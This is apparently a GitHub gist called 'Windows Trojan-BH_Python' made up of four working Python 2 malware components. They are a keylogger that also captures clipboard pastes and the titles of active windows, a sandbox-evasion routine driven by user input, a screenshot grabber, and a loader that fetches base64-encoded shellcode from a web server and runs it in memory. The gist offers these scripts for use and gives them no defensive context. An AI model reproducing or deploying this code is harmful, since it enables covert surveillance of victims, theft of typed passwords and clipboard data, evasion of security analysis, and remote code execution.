Created
February 18, 2015 17:52
-
-
Save sh1nu11bi/fd79f16b18f656c7dced to your computer and use it in GitHub Desktop.
Windows Trojan-BH_Python
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ctypes import * | |
| import pythoncom | |
| import pyHook | |
| import win32clipboard | |
| user32 = windll.user32 | |
| kernel32 = windll.kernel32 | |
| psapi = windll.psapi | |
| current_window = None | |
| def get_current_process(): | |
| # get a handle to the foreground window | |
| hwnd = user32.GetForegroundWindow() | |
| # find the process ID | |
| pid = c_ulong(0) | |
| user32.GetWindowThreadProcessId(hwnd, byref(pid)) | |
| # store the current process ID | |
| process_id = "%d" % pid.value | |
| # grab the executable | |
| executable = create_string_buffer("\x00" * 512) | |
| h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid) | |
| psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) | |
| # now read it's title | |
| window_title = create_string_buffer("\x00" * 512) | |
| length = user32.GetWindowTextA(hwnd, byref(window_title),512) | |
| # print out the header if we're in the right process | |
| print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value) | |
| # close handles | |
| kernel32.CloseHandle(hwnd) | |
| kernel32.CloseHandle(h_process) | |
| def KeyStroke(event): | |
| global current_window | |
| # check to see if target changed windows | |
| if event.WindowName != current_window: | |
| current_window = event.WindowName | |
| get_current_process() | |
| # if they pressed a standard key | |
| if event.Ascii > 32 and event.Ascii < 127: | |
| print chr(event.Ascii), | |
| else: | |
| # if [Ctrl-V], get the value on the clipboard | |
| # added by Dan Frisch 2014 | |
| if event.Key == "V": | |
| win32clipboard.OpenClipboard() | |
| pasted_value = win32clipboard.GetClipboardData() | |
| win32clipboard.CloseClipboard() | |
| print "[PASTE] - %s" % (pasted_value), | |
| else: | |
| print "[%s]" % event.Key, | |
| # pass execution to next hook registered | |
| return True | |
| # create and register a hook manager | |
| kl = pyHook.HookManager() | |
| kl.KeyDown = KeyStroke | |
| # register the hook and execute forever | |
| kl.HookKeyboard() | |
| pythoncom.PumpMessages() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes | |
| import random | |
| import time | |
| import sys | |
| user32 = ctypes.windll.user32 | |
| kernel32 = ctypes.windll.kernel32 | |
| keystrokes = 0 | |
| mouse_clicks = 0 | |
| double_clicks = 0 | |
| class LASTINPUTINFO(ctypes.Structure): | |
| _fields_ = [("cbSize", ctypes.c_uint), | |
| ("dwTime", ctypes.c_ulong) | |
| ] | |
| def get_last_input(): | |
| struct_lastinputinfo = LASTINPUTINFO() | |
| struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO) | |
| # get last input registered | |
| user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo)) | |
| # now determine how long the machine has been running | |
| run_time = kernel32.GetTickCount() | |
| elapsed = run_time - struct_lastinputinfo.dwTime | |
| print "[*] It's been %d milliseconds since the last input event." % elapsed | |
| return elapsed | |
| def get_key_press(): | |
| global mouse_clicks | |
| global keystrokes | |
| for i in range(0,0xff): | |
| if user32.GetAsyncKeyState(i) == -32767: | |
| # 0x1 is the code for a left mouse click | |
| if i == 1: | |
| mouse_clicks += 1 | |
| return time.time() | |
| else: | |
| keystrokes += 1 | |
| return None | |
| def detect_sandbox(): | |
| global mouse_clicks | |
| global keystrokes | |
| max_keystrokes = random.randint(10,25) | |
| max_mouse_clicks = random.randint(5,25) | |
| double_clicks = 0 | |
| max_double_clicks = 10 | |
| double_click_threshold = 0.250 | |
| first_double_click = None | |
| average_mousetime = 0 | |
| max_input_threshold = 30000 | |
| previous_timestamp = None | |
| detection_complete = False | |
| last_input = get_last_input() | |
| # if we hit our threshold let's bail out | |
| if last_input >= max_input_threshold: | |
| sys.exit(0) | |
| while not detection_complete: | |
| keypress_time = get_key_press() | |
| if keypress_time is not None and previous_timestamp is not None: | |
| # calculate the time between double clicks | |
| elapsed = keypress_time - previous_timestamp | |
| # the user double clicked | |
| if elapsed <= double_click_threshold: | |
| double_clicks += 1 | |
| if first_double_click is None: | |
| # grab the timestamp of the first double click | |
| first_double_click = time.time() | |
| else: | |
| # did they try to emulate a rapid succession of clicks? | |
| if double_clicks == max_double_clicks: | |
| if keypress_time - first_double_click <= (max_double_clicks * double_click_threshold): | |
| sys.exit(0) | |
| # we are happy there's enough user input | |
| if keystrokes >= max_keystrokes and double_clicks >= max_double_clicks and mouse_clicks >= max_mouse_clicks: | |
| return | |
| previous_timestamp = keypress_time | |
| elif keypress_time is not None: | |
| previous_timestamp = keypress_time | |
| detect_sandbox() | |
| print "We are ok!" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import win32gui | |
| import win32ui | |
| import win32con | |
| import win32api | |
| # grab a handle to the main desktop window | |
| hdesktop = win32gui.GetDesktopWindow() | |
| # determine the size of all monitors in pixels | |
| width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN) | |
| height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN) | |
| left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN) | |
| top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN) | |
| # create a device context | |
| desktop_dc = win32gui.GetWindowDC(hdesktop) | |
| img_dc = win32ui.CreateDCFromHandle(desktop_dc) | |
| # create a memory based device context | |
| mem_dc = img_dc.CreateCompatibleDC() | |
| # create a bitmap object | |
| screenshot = win32ui.CreateBitmap() | |
| screenshot.CreateCompatibleBitmap(img_dc, width, height) | |
| mem_dc.SelectObject(screenshot) | |
| # copy the screen into our memory device context | |
| mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY) | |
| # save the bitmap to a file | |
| screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp') | |
| # free our objects | |
| mem_dc.DeleteDC() | |
| win32gui.DeleteObject(screenshot.GetHandle()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib2 | |
| import ctypes | |
| import base64 | |
| # retrieve the shellcode from our web server | |
| url = "http://localhost:8000/shellcode.bin" | |
| response = urllib2.urlopen(url) | |
| # decode the shellcode from base64 | |
| shellcode = base64.b64decode(response.read()) | |
| # create a buffer in memory | |
| shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode)) | |
| # create a function pointer to our shellcode | |
| shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p)) | |
| # call our shellcode | |
| shellcode_func() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment